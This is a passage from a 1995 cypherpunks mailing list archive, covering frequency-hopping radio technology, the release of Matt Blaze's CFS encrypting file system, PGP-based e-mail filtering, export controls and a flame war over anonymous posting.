Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMN8PKfgyLN8bw6ZVAQGC4AP/fSCT1Fxxa/Q8x5ujQNeN6rk8tWtt2K2c
S63F3ff3FJ6lbqAQLEZiXcbyYJSMDeZt0+3vSckKG54xa3dz/e+a9K7e3eE+jdrF
tZRvwYMvH2X3CKszVbh++I9cO8MlJfTgrMJc4GZKEpdfl0qxuQpz5YPqU9uIS3SL
mgJ5nqn7iew=
=fTao
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 26 Dec 1995 00:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: FH radios
In-Reply-To: <v01530512ad01d78bc507@[206.86.1.35]>
Message-ID: <30de2109.16381795@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote:

> Thus in a frequency-hopping radio you can push the retuning (read RF
> phase-locked loop) technology to its limit and build transmitters and
> receivers around them. These typically hop in the order of 100 times a
> second. The adversary has to find the uncorrelated signal very quickly
> indeed *and* have PLL technology at least as good as yours to recover
> anything from it. Finding the signal generally means listening to all
> frequencies at once, requiring huge amounts of hardware parallelism and/or
> realtime computing power. Once you throw ten or so radios onto the same
> band, it's no longer any use looking for the strongest signal, making that
> approach useless.

This is nowhere near the limit of the technology.  15 years ago, I was
working on PLLs that would stabilize within a couple degrees of final
phase within 3.5 microseconds.  That permits you to do useful work at
100,000 hops per second.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 26 Dec 1995 05:43:09 +0800
To: cypherpunks@toad.com
Subject: New release (v1.3.2) of CFS encrypting file system available
Message-ID: <199512252112.QAA07556@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Perhaps this isn't the best time for me to post this here; apologies
in advance if this sparks another flame fest.  -matt]

Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An impoved key management scheme now allows chaning the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES, MacGuffin, and SAFER-SK128 encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dxm@alpha.c2.org
Date: Tue, 26 Dec 1995 08:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: New Release of CFS
Message-ID: <199512260014.QAA08982@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:

> [Perhaps this isn't the best time for me to post this here; apologies
> in advance if this sparks another flame fest.  -matt]
>
> Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
> File System, is now available upon request for research and experimental
> use in the US and Canada.

Dear Mr. Blaze:

As you seem to have noticed, a few subscribers to cypherpunks are more
interested in exploring their own personal psychopathologies than in the
creation and spread of strong cryptography.  Please do not feel that you
need to apologize for their actions, and especially please do not restrict
your actions and/or posts because of them.

To correct merely one of the many mis-statements made by these people
desperate to draw attention to themselves, the Linux community is NOT
interested in 'out-of-the-box'.  If we were interested in 'out-of-the-
box', we would be running OSs that COME in a box.  What we ARE interested
in is source (or, if source isn't available, at least 128 bit keys).
If you provide source, we'll port it.  It's that simple.  While support
is nice, and appreciated, it is NOT NEEDED.  We can take care of ourselves.

So, on behalf of the Linux community and those of us running CFS, thank
you very much for your contribution.  And please don't let a couple of
idiots like these lower your opinion of the over 1 million Linux users
who appreciate your efforts and support.

--
Deus Ex Machina				dxm@alpha.c2.org
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Dec 1995 10:21:59 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251953.OAA01614@homeport.org>
Message-ID: <T6qogD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> 	It would seem that only accepting signed mail, and caching the
> hash of the signed part would work pretty well, and also not require

Keeping a hash of the signed part sounds like an excellent defense from the
attack of recycled messages. "Your mail blah blah is being returned to you
because it appears to be similar to the e-mail you send on dd/mm/yy". Cool.

> anything (other than a signature) from the remote end.  The cost of a
> spam is the time to generate a new key pair.  (You probably need some
> way to add new keys, for people to be able to say 'I'd like to talk to
> you.')

When thinking of a protocol, it's useful to consider what do we do in "real
life" to reach an important person: Either ask a common acquiantance to
introduce you, or go through a secretary.

Say, Alice wants to send e-mail to Bob who doesn't accept e-mail to strangers.
Alce may learn that Bob accepts Carol's e-mail, and ask Carol to forward
Alice's e-mail to Bob (with Carol's signature).

An interesting idea would be for Bob (together with other people) to pay some
David to screen their e-mail received from strangers (manually, or with the
help of some programs) and to decide whether to pass them on to Bob or to
discard it. E-mail from known senders goes straight to Bob, and e-mail from
strangers goes to David the screener. Not unlike "real life".

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 26 Dec 1995 06:55:52 +0800
To: lull@acm.org (John Lull)
Subject: Re: FH radios
In-Reply-To: <30de2109.16381795@smtp.ix.netcom.com>
Message-ID: <9512252206.AA10260@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote:
> 
> > Thus in a frequency-hopping radio you can push the retuning (read RF
> > phase-locked loop) technology to its limit and build transmitters and
> > receivers around them. These typically hop in the order of 100 times a
> > second. The adversary has to find the uncorrelated signal very quickly
> > indeed *and* have PLL technology at least as good as yours to recover
> > anything from it. Finding the signal generally means listening to all
> > frequencies at once, requiring huge amounts of hardware parallelism and/or
> > realtime computing power. Once you throw ten or so radios onto the same
> > band, it's no longer any use looking for the strongest signal, making that
> > approach useless.
> 
> This is nowhere near the limit of the technology.  15 years ago, I was
> working on PLLs that would stabilize within a couple degrees of final
> phase within 3.5 microseconds.  That permits you to do useful work at
> 100,000 hops per second.
> 
	There is also a newer technology called direct digital synthesis
or DDS that works by accumulating phase (adding to the previous value) 
each tick of a high frequency clock in a register at a rate determined
by the contents of another register (the value here sets the frequency)
with the upper bits of the accumulated phase being used to address a
sine/cosine lookup table rom which in turn feeds digital output values
into a D/A converter.  The output of the D/A converter is a sampled 
approximation of a sine or cosine wave at a frequency set by the
increment register.  The sample rate is set by the high frequency clock
rate.

	DDS permits instanteous frequency shifts with phase continuous
output by simply reloading the phase increment register with another
value.  Unlike phase locked loop synthesizers a there is no transient
phase and frequency error after a frequency shift.

	The primary limitation of DDS is set by the speed of the 
rquired digital hardware (and various subtler considerations such as
clock jitter and output filtering) - current VLSI implementations work
up to around 100 mhz with .1 hz or better frequency resolution.

	And with a bit more sophistication the DDS principle can be used
to digitally generate vector modulation (BPSK, QPSK, QAM etc) and even
digitally filter the result with FIR filters to limit occupied
bandwidth.   There have even been some experiments with generating
broadcast FM stereo signals directly from digital music samples using
this technology.

	But to get back to the original point of this thread - while
such techniques are possible (as is full hard encryption), it is my
understanding that actual conusmer 900 mhz digital cordless phones
that use frequency hopping use a very limited set of frequencies
and a small set of fixed hopping patterns and don't hop very fast. 

	There is certainly little additional cost to building a
trully secure digital cordless phone given the dense ASIC technology
that is standard in this kind of product - but someone has to
persuade the manufacturers that there is a real need and find a way
to allow them to export the product.

	When the brand of cordless phones that most emphasizes security
from eavesdropping in its point of sale advertising display is the one that
uses open FM with simple speech inversion you know there is something
wrong, particularly when the company that makes it is a pioneer in
really secure digital speech over handheld radios (and a big governmeent
contractor).

						Dave Emery  N1PRE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NOT Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 08:22:32 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225094550.27577E-100000@netcom23>
Message-ID: <Pine.SUN.3.91.951224353450.23327E-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain


(No, this is not Jonathan Blake; see .sig below :)

Jonathan Blake <grafolog@netcom.com> writes:
> 	When I get the bugs out of the procmail script I'm
> 	writing, to accomplish this, I'll send it to you.

I'd be very interested. I may even use it, if it works. :)
I like Adam Shostak's suggestion regarding caching hashes of signed
portions of incoming e-mail.
If the filter is going to keep track of e-mail history, then another possible
useful feature would be to limit the number of e-mails accepted from a given
party (even distinict). "You mail is being returned to you because you're
only authorized to send 10 e-mails here in a 24-hour period". Heh.

> 	However, won['t most messages have the name of the intended
> 	recipient inside the PGP signature lines?

Not necessarily. Most e-mails say something like "Dear Alice," but not all.
I wish the important headers were included in the signed portion.

Here's another variant of the same attack:

Bob sends Alice a PGP-signed e-mail. Alice posts a Usenet forgery, making
it look like it came from Bob, and using the same PGP-signed body.

> > Alice _may_ notice that the _Received:_ headers are weird, but this
> > forgery will certainly pass through a script that checks signatures.
>
> 	I'll have to give this some thought.  Have the script
> 	match the from id, with the message id.  << Not sure
> 	how I can do this one, yet.  >>

It's a piece of cake to forge the message-id to match the forged "From:".
In fact, I'll do just that in this article, and I bet it'll take me
less than a minute. Besides, your message-id doesn't match your host. :)

I'm off to teach C++ now. (Yes, on Xmas)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Dec 1995 08:16:44 +0800
To: cypherpunks@toad.com
Subject: Bidzos on C-Span 2
Message-ID: <199512252241.RAA26805@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


If you care, Jim is smoothly hawking a beautiful world of 
easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.


At a session in San Francisco, probably a recording.


Jingle jangle.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Dec 1995 08:24:22 +0800
To: cypherpunks@toad.com
Subject: Bidzos Coda
Message-ID: <199512252256.RAA27240@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Bidzos show was recorded 12/8/95 at the Commonwealth Club 
in SF. It finished here at about 5:45 PM.


Only caught  a piece. Jim was answering written questions about 
a range of crypto and Internet security issues from the 
audience.


Among other things, he says they're working on an encryption 
program "closely tied to the OS of portables, to protect the 
data if the machine is lost or stolen."


He also said, "don't throw tomatoes," but they're doing 
something with "private key escrow" for those who want to 
provide access to their encrypted material in case of death or 
other emergency.


Maybe some other idle sinner saw more, or was at the realtime 
tomato-chucker.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.toad.com>
Date: Tue, 26 Dec 1995 09:15:39 +0800
To: Jason Rentz <andr0id@midwest.net>
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <Pine.LNX.3.91.951225181018.618A-100000@deimos>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Jason Rentz wrote:

> Forgive me if this is a stupid question.
> 
> I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)
> 
> I have several simple scripts that are simple yet handle important realtime
> call proccessing tasks and remote control operations.  These programs are my
> programs but are running on a system that is dialed into by the vendor once
> in a while.  
> 
> Is there a way to encrypt a script yet still allow it to be runnable?  I
> know that the simple answer is to write it in C and compile it but I don't
> have the means of doing that at the moment.  (i.e. there is not compiler on
> the system)

You can try something similar to what gzexe does, but...

> I thought of a few simple protections but they all involve decrypting before
> running.

...unless the CPU has built in decryption this will be a necessity.  A 
compromise might be to put this into the kernel

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:36:08 +0800
To: cypherpunks@toad.com
Subject: Re: Bidzos on C-Span 2
Message-ID: <v02120d03ad04dff830d3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 12/25/95, John Young wrote:
>If you care, Jim is smoothly hawking a beautiful world of
>easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.

Actually, he did a pretty good job of towing the er, party line. Lots of
good opportunities for analogical heavy lifting in arguments with statists.
"Suppose you had a very strong door which protected your whole house and
made it inviolate. Suppose then the government then wanted to have copy of
your door keys on the off-chance you turn into a crack dealer someday...",
etc.

Except for the fact that he wants Uncle to protect his patents, that is...
;-).

This was done on December 8 at the Commonwealth Club in SFO.  Were there
c'punks there? The questions sounded like it...

He also said something about some kind of magic badge with biometric/PK
software which would allow you to work anywhere there was a network
connection. Reminiscent of our discussions about Xerox PARC's ubiquitous
computing stuff, Gerry O'Neil's 2081, etc.

I feel a rant coming on about this "information toaster" stuff, Metcalfe's
fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take
cover everybody...

Merry Christmas!


Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:36:41 +0800
To: pam_308bait@thumper.vmeng.com
Subject: (cpx) Re: Bidzos on C-Span 2
Message-ID: <v02120d06ad04e49345ab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 12/25/95, John Young wrote:
>If you care, Jim is smoothly hawking a beautiful world of
>easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.

Actually, he did a pretty good job of towing the er, party line. Lots of
good opportunities for analogical heavy lifting in arguments with statists.
"Suppose you had a very strong door which protected your whole house and
made it inviolate. Suppose then the government then wanted to have copy of
your door keys on the off-chance you turn into a crack dealer someday...",
etc.

Except for the fact that he wants Uncle to protect his patents, that is...
;-).

This was done on December 8 at the Commonwealth Club in SFO.  Were there
c'punks there? The questions sounded like it...

He also said something about some kind of magic badge with biometric/PK
software which would allow you to work anywhere there was a network
connection. Reminiscent of our discussions about Xerox PARC's ubiquitous
computing stuff, Gerry O'Neil's 2081, etc.

I feel a rant coming on about this "information toaster" stuff, Metcalfe's
fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take
cover everybody...

Merry Christmas!


Cheers,
Bob

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws!
e-mail rah@shipwright.com for details...
-------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:44:08 +0800
To: cypherpunks@toad.com
Subject: Re: (cpx) Re: Bidzos on C-Span 2
Message-ID: <v02120d00ad04ea1a9222@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Oops.

You can shoot me now...

Sorry, folks! e$pam first and let god sort 'em out.

Fixing that little problem this week, as a matter of fact.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Tue, 26 Dec 1995 09:37:22 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: anonther anonymous poster afraid to even tell us who they are
In-Reply-To: <199512252215.XAA07650@utopia.hacktic.nl>
Message-ID: <9512260044.AA14158@all.net>
MIME-Version: 1.0
Content-Type: text


Another anonymous poster tells the cypherpunks to abandon liberty by
abusing it.  When will the cypherpunks learn stand up to these people.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 26 Dec 1995 13:26:20 +0800
To: cypherpunks@toad.com
Subject: Assault presses with cop killer computers.
Message-ID: <199512260507.VAA09404@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


While channel surfing around 6PM today on Christmas day, I saw 
President Clinton announce the grave international threat 
posed by terrorists, drug dealers and money launderers wielding 
computers (Only three horsemen -- he left out child pornographers.)

He was immediately followed by an Expert In Television Expertise, 
who told us that computers were getting more and more powerful, and 
doing more and more things, and that Something Must Be Done.

The Expert did not actually use the phrase "The first Amendment was never 
intended to protect modern assault presses using cop killer computers", 
but that was the message.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 12:14:29 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: FH radios
In-Reply-To: <m0tUNYc-0008xnC@pacifier.com>
Message-ID: <199512260358.WAA02279@homeport.org>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:

| Is there actually a restriction on the export of really-fast
| frequency-hopping radios, even those (like cordless phones) which have no
| clear military value?

Yes.  The ITARs restrict the export of any radio which hops faster
than one frequency per second.  (Or ten seconds if it hops between
more than 8 bands.)  See ITAR XIII.b.1.iii.C 
(ftp://ftp.cygnus.com/pub/export/itar.in.full)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 26 Dec 1995 07:48:00 +0800
To: cypherpunks@toad.com
Subject: Re: corporate bashing
Message-ID: <199512252215.XAA07650@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Fred seems to have been slipping through my filters in recent 
days. Though I usually trash any message containing a reference 
to him, I thought that this latest escalation into the 
ionosphere of net-sillies begs to be brought to heel...

On 24 Dec 95 at 17:20, Fred Cohen wrote:

> and that anonymity should be used as an escape from
> responsibility for what they do and say.  If you want to
> remain free to speak your mind, you have to become
> responsible in at least two ways:
> 
> 	1 - You must top slandering people.
> 	2 - You must stop using anonymity as a way to avoid being 
>           responsible.
> 
> When I say must, I am not intending to mean anything less. 
> If the cypherpunks continue to do these two things, they will
> rapidly find that they are doing more to destroy all of our
> rights to free speech in the Internet than they ever did to
> encourage freedom of expression.

There are several things wrong with this, but first, just on
the surface: Fred has now dropped his cyberdrawers and stands
before us displaying the ugly engine of his manhood, the handle
by which he maintains a grip on his pointless existence. He
reveals himself to be yet another in that small, tired parade
of self-appointed lightning rods -- people with so little of
import in their lives that they have to resort to trolling for
what they can claim are offenses against them, then flex the
borrowed, imagined musculature of mindless law to rise in
self-righteous threats of exercise of vindictive wrath. 

This is worse than "My big brother will kick your ass!" It is
like a 90-pound weakling going to the beach with a large but
retarded cousin in tow. The idea is to troll to get sand 
kicked in his face, then to point to the drooling cousin and 
use him as a lever to gain and exercise control over the 
hapless dupes of the ruse.

Freds have existed on BBS's, and before the technological age 
in most small clubs and societies. In the Internet they show up 
in newsgroups and on mailing lists, and when crossed they 
ALWAYS descend to threats of legal action. So predictable, so 
utterly dull and unimaginative, they are like the party guest 
who has that inappropriate laugh, who doesn't seem to notice 
that pairs of people are together, who approaches people oddly 
and, in the end, makes a scene and reveals himself to be a 
complete fruitcake. Unmoderated fission looking for a place to 
fulminate.

Fred, you've come to the wrong place. If you want to be
ignored, just pack your terminal and stay home with the
sitcoms. Noone asked you to interject your trolls and threats
here. You invited yourself, and whatever you are suffering is 
of your own creation.

Speaking of Freds brings me to a more interesting aspect of 
this nonsense: How do we know there is only one Fred? Fred 
doesn't sign his messages...  oh-oh. This attack of deja vu 
feels like I've had it before.

Why do I get the feeling that Fred is about to embarrass 
himself terribly by blurting out some of the poison that fills 
his soul? Let him who hath not slandered cast the first suit.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMN8TVEjw99YhtpnhAQFDngH/cTzEDHzxYZ7Z9jOmoALxaIdxpgpvlIr+
/zsZndz1KfQlqUunH5i7YsJS7tm/XOsrRcWQgKQEr9WaI8wRgrqh5g==
=Hl/v
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 26 Dec 1995 17:18:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption Discrimination from Sun
In-Reply-To: <199512252216.OAA09495@netcom2.netcom.com>
Message-ID: <199512260855.DAA16540@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes (re: The Java Cup)
> While reading the contest rules, I found the following one
> particularly interesting...
> 
>    "No entries may include encryption as a feature
>     or part of an applet."
[...]
> Doubtless the reason Sun nixed encryption is because this is an
> international contest, and they did not want to deal with legal
> hassles involving international borders and different laws in 
> every country.    

OTOH, they don't have any ITAR-like rules about not installing crypto hooks.

(It's pretty amusing that residents of Romania are eligible to enter, but
not residents of Vermont. At least to me, since I don't live in Vermont. ;) 

> Nonetheless, they seem to have missed an excellent opportunity
> to encourage the migration of privacy software into the new 
> realm they are creating. 

I'm not convinced that such a contest is capable of that anyway. As in most
such contests, entries basically become the property of the sponsor. In this
case, "By participating in the Contest, Contestant waives all claim to 
intellectual property rights in the entry, including patent rights and 
copyright, and waives all moral rights, except where prohibited."  (Wow !
I didn't know I could waive my moral rights !)

I'm not inclined to hand the Java privacy software on which I'm working over
to Sun, even though I like Sun. If I were just working on a Tetris applet or
something, I wouldn't mind....

-Futplex <futplex@pseudonym.com>		Cowboys 37, Cardinals 13; 
			Merry Christmas, 49ers: We'll see you in Dallas !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Tue, 26 Dec 1995 17:09:50 +0800
To: cypherpunks@toad.com
Subject: HRB Systems Data Storage Encryptor
Message-ID: <199512260845.JAA28578@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Check out http://www.hrb.com/encryption/ssp.html, your
exclusive source of the Ultron Crypto-Engine (tm)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Dec 1995 14:05:55 +0800
To: die@die.com
Subject: Re: FH radios
Message-ID: <m0tUNYc-0008xnC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 12/25/95 -0500, you wrote:

>	There is certainly little additional cost to building a
>trully secure digital cordless phone given the dense ASIC technology
>that is standard in this kind of product - but someone has to
>persuade the manufacturers that there is a real need and find a way
>to allow them to export the product.
>
>						Dave Emery  N1PRE

Is there actually a restriction on the export of really-fast
frequency-hopping radios, even those (like cordless phones) which have no
clear military value?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Dec 1995 14:11:05 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: [Rant] Flame threads and factual accuracy
Message-ID: <m0tUNkm-0008yRC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 AM 12/25/95 -0500, you (Fred Cohen) wrote:

>With rights come responsibilities.  If you want the right of free speech, you
>have to use it responsibly - otherwise, you will lose the right - and quite
>possible lose it for me as well.

This commentary is pure bullshit.  If it were possible to quantify it
throughout history, I strongly suspect that the vast majority of instances
where "free speech" was LOST (or was never had in the first place) occurred
NOT because of some objectively agreed-upon ABUSE (irresponsible use) of
that free speech, but in fact merely because those in power WANTED there to
be no free speech.

In short, "losing the right" had NOTHING to to with abuse.  (Though
admittedly, that might be a common excuse given...in lieu of the truth!)


Fred, you richly deserve your bad reputation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
